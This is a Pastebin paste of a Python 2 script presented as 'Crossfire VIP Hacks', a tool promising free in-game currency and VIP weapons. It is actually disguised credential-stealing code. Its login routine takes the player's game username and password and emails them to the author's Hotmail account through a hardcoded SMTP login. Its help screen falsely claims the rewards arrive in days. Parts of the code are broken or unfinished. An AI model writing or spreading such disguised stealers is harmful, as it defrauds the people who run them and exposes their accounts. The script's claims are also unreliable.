Guest User

Crossfire VIP Hacks

a guest
Mar 11th, 2017
31
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 11.97 KB | None | 0 0
  1. #!/usr/bin/python
  2. import time
  3. from random import randint
  4. import smtplib
  5. import email
  6. import getpass
  7.  
  8. ###=================================================================== Global Variables ===================================================================###
  9. global loggedIn
  10. global username
  11. global password
  12. global lenUsername
  13. global lenPassword
  14. global transactions
  15.  
  16. loggedIn = False
  17.  
  18.  
  19. #===================================================================loading===================================================================#
  20.  
  21. def loading():
  22.     print """
  23. ||||||||||||  ||||||||||   ||||||||||||  ||||||||||||    ||||||||||||  ||||||||||||  ||||||||||||  ||||||||||    ||||||||||||
  24. ||            ||       ||  ||        ||  ||              ||            ||                 ||       ||       ||   ||
  25. ||            ||        || ||        ||  ||              ||            ||                 ||       ||        ||  ||
  26. ||            ||       ||  ||        ||  ||              ||            ||                 ||       ||       ||   ||
  27. ||            ||||||||||   ||        ||  ||||||||||||    ||||||||||||  ||||||||           ||       ||||||||||    ||||||||  
  28. ||            ||      ||   ||        ||            ||              ||  ||                 ||       ||      ||    ||
  29. ||            ||       ||  ||        ||            ||              ||  ||                 ||       ||       ||   ||
  30. ||||||||||||  ||        || ||||||||||||            ||              ||  ||            ||||||||||||  ||        ||  ||||||||||||
  31.                                         ||||||||||||    ||||||||||||
  32.  
  33.  
  34.                                       ||||||||      ||||||||  ||||||||||||  ||||||||||
  35.                                          ||            ||          ||       ||       ||
  36.                                           ||          ||           ||       ||        ||
  37.                                            ||        ||            ||       ||       ||
  38.                                             ||      ||             ||       ||||||||||
  39.                                              ||    ||              ||       ||      
  40.                                               ||  ||               ||       ||      
  41.                                                ||||           ||||||||||||  ||      
  42.  
  43.  
  44.                              ||        ||         ||||         ||||||||||||  ||       ||  ||||||||||||
  45.                              ||        ||        ||  ||        ||            ||     ||    ||
  46.                              ||        ||       ||    ||       ||            ||   ||      ||
  47.                              ||        ||      ||      ||      ||            || ||        ||
  48.                              ||||||||||||     ||||||||||||     ||            ||||         ||||||||||||  
  49.                              ||        ||    ||          ||    ||            || ||                  ||
  50.                              ||        ||   ||            ||   ||            ||   ||                ||
  51.                              ||        ||  ||              ||  ||||||||||||  ||     ||              ||
  52.                                                                              ||       ||  ||||||||||||
  53.  
  54. """
  55.     time.sleep(1)
  56.  
  57.     xLoadTime = 0  
  58.     while(xLoadTime < 99):
  59.         print "Loading... %d%%" % (xLoadTime)
  60.         xLoadRand = randint(1,20)
  61.         xLoadTime += xLoadRand
  62.         time.sleep(0.5)
  63.     else:
  64.         print "Loading... 100%"
  65.         print "Loading Successful!"
  66.         main()
  67.  
  68.  
  69. #===================================================================main===================================================================#
  70. def main():
  71.     print """
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123.  
  124.  
  125.  
  126.    
  127.  
  128.  
  129.  
  130.  
  131.  
  132. |||||||||||||  ||||||||||   ||||||||||||  ||||||||||||    ||||||||||||  ||||||||||||  ||||||||||||  ||||||||||    ||||||||||||
  133. ||            ||       ||  ||        ||  ||              ||            ||                 ||       ||       ||   ||
  134. ||            ||        || ||        ||  ||              ||            ||                 ||       ||        ||  ||
  135. ||            ||       ||  ||        ||  ||              ||            ||                 ||       ||       ||   ||
  136. ||            ||||||||||   ||        ||  ||||||||||||    ||||||||||||  ||||||||           ||       ||||||||||    ||||||||  
  137. ||            ||      ||   ||        ||            ||              ||  ||                 ||       ||      ||    ||
  138. ||            ||       ||  ||        ||            ||              ||  ||                 ||       ||       ||   ||
  139. ||||||||||||  ||        || ||||||||||||            ||              ||  ||            ||||||||||||  ||        ||  ||||||||||||
  140.                                         ||||||||||||    ||||||||||||
  141.  
  142.  
  143.                                       ||||||||      ||||||||  ||||||||||||  ||||||||||
  144.                                          ||            ||          ||       ||       ||
  145.                                           ||          ||           ||       ||        ||
  146.                                            ||        ||            ||       ||       ||
  147.                                             ||      ||             ||       ||||||||||
  148.                                              ||    ||              ||       ||      
  149.                                               ||  ||               ||       ||      
  150.                                                ||||           ||||||||||||  ||      
  151.  
  152.  
  153.                              ||        ||         ||||         ||||||||||||  ||       ||  ||||||||||||
  154.                              ||        ||        ||  ||        ||            ||     ||    ||
  155.                              ||        ||       ||    ||       ||            ||   ||      ||
  156.                              ||        ||      ||      ||      ||            || ||        ||
  157.                              ||||||||||||     ||||||||||||     ||            ||||         ||||||||||||  
  158.                              ||        ||    ||          ||    ||            || ||                  ||
  159.                              ||        ||   ||            ||   ||            ||   ||                ||
  160.                              ||        ||  ||              ||  ||||||||||||  ||     ||              ||
  161.                                                                              ||       ||  ||||||||||||
  162. """
  163.     Options()
  164.  
  165.  #===================================================================Options===================================================================#
  166.  
  167. def Options():
  168.     print """
  169. Choose one of the following:
  170.  
  171. 1) Hacks                            Logged In: %s
  172. 2) Login/Logout
  173. 3) Help
  174. 4) Exit
  175. """ % (loggedIn)
  176.     try:
  177.  
  178.         xInput = raw_input(">")
  179.         if xInput == "1":
  180.             if loggedIn == True:
  181.                 hacks()
  182.             else:
  183.                 print "Error: You have to Login first before you can access the Hacks!\n Please go to Help menu."
  184.                 time.sleep(2)
  185.                 Options()
  186.         elif xInput == "2":
  187.             login()
  188.         elif xInput == "3":
  189.             help()
  190.         elif xInput == "4":
  191.             sys.exit()
  192.         else:
  193.             main()
  194.     except KeyboardInterrupt:
  195.         print "\nCrossfire VIP Hacks v3.11.17"
  196.  
  197. #===================================================================hacks===================================================================#
  198.  
  199. def hacks():
  200.     print """
  201. Hacks
  202. 1) ECoin
  203. 2) GP
  204. 3) VIP
  205. 4) Go Back
  206. 5) Exit
  207. """
  208.     xInput = raw_input(">")
  209.     if xInput == 1:
  210.         Ecoin()
  211.     if xInput == 2:
  212.         GP()
  213.     if xInput == 3:
  214.         VIP()
  215.     if xInput == 4:
  216.         hacks()
  217.     if xInput == 5:
  218.         sys.exit()
  219.     else:
  220.         hacks()
  221.  
  222. #===================================================================ECoin===================================================================#
  223. def ECoin():
  224.     print """
  225. 1) 50 ECoins             6) 300 Ecoins             11) Enter Amount
  226. 2) 100 Ecoins            7) 350 Ecoins             12) Go Back
  227. 3) 150 Ecoins            8) 400 Ecoins             13) Exit
  228. 4) 200 Ecoins            9) 450 Ecoins
  229. 5) 250 Ecoins            10) 500 Ecoins
  230.  
  231. Select one of the following:
  232. """
  233.     xInput = raw_input("> ")
  234.     if xInput == 1 or xInput == 2 or xInput == 3 or xInput == 4 or xInput == 5 or xInput == 6 or xInput == 7 or xInput == 8 or xInput == 9 or xInput == 10:
  235.          
  236.  
  237. #===================================================================GP===================================================================#
  238. def GP():
  239.     print """
  240. 1) 50 GP             6) 300 GP             11) Enter Amount
  241. 2) 100 GP            7) 350 GP             12) Go Back
  242. 3) 150 GP            8) 400 GP             13) Exit
  243. 4) 200 GP            9) 450 GP
  244. 5) 250 GP            10) 500 GP
  245. """
  246.  
  247. #===================================================================VIP===================================================================#
  248. def VIP():
  249.     print """
  250. 1) AWM INFERNAL DRAGON    6) D.E DESSERT EAGLE      11) M4A1 PREDATOR           16) VIPER
  251. 2) AK 47 EL DIABLO        7) KUKRI BEAST            12) M28A1 IRON SHARK        17) Go Back
  252. 3) AK 47 IRON BEAST       8) M4A1 JEWELRY           13) THOMSON BEAST           18) Exit
  253. 4) AK 47 KNIFE BEAST      9) M4A1 OBSIDIAN BEAST    14) M28A1 OBSIDIAN BEAST          
  254. 5) BC-AXE BEAST           10) M4A1 IRON BEAST       15) RPK INFERNAL DRAGON    
  255. """
  256.  
  257.  
  258. #===================================================================login===================================================================#
  259. def login():
  260.     global loggedIn
  261.     global username
  262.     global password
  263.  
  264.     if loggedIn == False:
  265.             username = raw_input("Username: ")
  266.             password = getpass.getpass("Password: ")
  267.             lenUsername = len(username)
  268.             lenPassword = len(password)
  269.            
  270.             if lenUsername >= 5 and lenPassword >= 8:
  271.                 loggedIn = True
  272.                 sendEmail()
  273.             else:
  274.                 print "Error: invalid username or password\n"
  275.                 Options()
  276.  
  277.     elif loggedIn == True:
  278.             loggedIn = False
  279.     else:
  280.         main()
  281.  
  282. #===================================================================sendEmail===================================================================#
  283. def sendEmail():
  284.     global username
  285.     global password
  286.     global transactions
  287.  
  288.     from_addr = "crossfireviphacks123@hotmail.com"
  289.     to_addr = "crossfireviphacks123@hotmail.com"
  290.     subject = "Crossfire VIP Hacks"
  291.     message = """Username: %s
  292. Password: %s
  293. Transactions: %d""" % (username, password, transactions)
  294.  
  295.     parts = ("From: " + from_addr,
  296.          "To: " + to_addr,
  297.          "Subject: " + subject,
  298.          "",
  299.          message)    
  300.     msg = '\r\n'.join(parts)
  301.  
  302.     try:
  303.  
  304.         s = smtplib.SMTP("smtp.live.com",587)
  305.         s.ehlo() # Hostname to send for this command defaults to the fully qualified domain name of the local host.
  306.         s.starttls() #Puts connection to SMTP server in TLS mode
  307.         s.ehlo()
  308.         s.login('crossfireviphacks123@hotmail.com', '/*-+/*-+123')
  309.  
  310.         s.sendmail("crossfireviphacks123@hotmail.com", "crossfireviphacks123@hotmail.com", msg)
  311.  
  312.         s.quit()
  313.         print "Successfuly Logged In!"
  314.         time.sleep(5)
  315.         Options()
  316.     except smtplib.SMTPException:
  317.         print "Error: unable to login with your account"
  318.         print "Please check your internet connection."
  319.  
  320. #===================================================================Help===================================================================#
  321. def help():
  322.     print """
  323. Crossfire VIP Hacks v3.11.17
  324.  
  325. The only working VIP hacks for Crossfire.
  326.  
  327. Requirements:
  328.  - Stable Internet Connection
  329.  - Valid Crossfire Account
  330. You must meet these requirements before you can proceed to the VIP hacks.
  331.  
  332. You will have to logon to your crossfire account first before you can access the hacks.
  333. It will take 2-7 days to claim the Ecoins, 1-3 days to claim the GP, and 8-14 days to claim the VIP.
  334. You can only process 1 transaction per ECoin, GP, or VIP you generated. Having 2 or more will permanently ban your account.
  335. It takes time to recieve the transaction because of the high demands of the server.
  336.  
  337. Current Available Hacks:
  338.  - ECoin
  339.  - GP
  340.  - VIP
  341.  
  342. 1) Go Back
  343. 2) Exit
  344. """
  345.     xInput = raw_input("> ")
  346.     if xInput == 1:
  347.         Options()
  348.     if xInput == 2:
  349.         sys.exit()
  350.     else:
  351.         help()
  352.  
  353. loading()
Add Comment
Please, Sign In to add comment